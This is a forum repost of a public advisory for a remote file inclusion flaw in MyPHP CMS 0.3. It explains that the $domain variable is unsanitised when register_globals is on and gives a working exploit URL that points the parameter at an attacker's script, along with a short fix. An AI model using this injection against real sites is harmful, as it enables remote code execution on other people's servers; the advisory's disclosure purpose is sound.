Jump to content
Guest Nemessis

[RST] MyPHP CMS <= 0.3 (domain) RFI

Recommended Posts

Guest Nemessis
Posted

http://www.milw0rm.com/exploits/1983

---------------------------------------------------------------------------

MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MyPHP CMS

version : latest version [ 0.3 ]

URL : http://sourceforge.net/projects/myphpcms

------------------------------------------------------------------

Exploit:

~~~~~~~

Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~

declare variabel $domain

---------------------------------------------------------------------------

Shoutz:

~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]

---------------------------------------------------------------------------

*/

Contact:

~~~~~~~

Nick: Kw3rLn

E-mail: ciriboflacs[at]YaHoo[dot]Com

Homepage: hTTp://RoSecurityGroup.net

/*

-------------------------------- [ EOF] ----------------------------------

# Further Notes

if ( !isset ( $installed ) )

{

header ( "Location: install_sql.php" );

}

added installed to the get request for the vulnerability to work correctly.

/str0ke

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...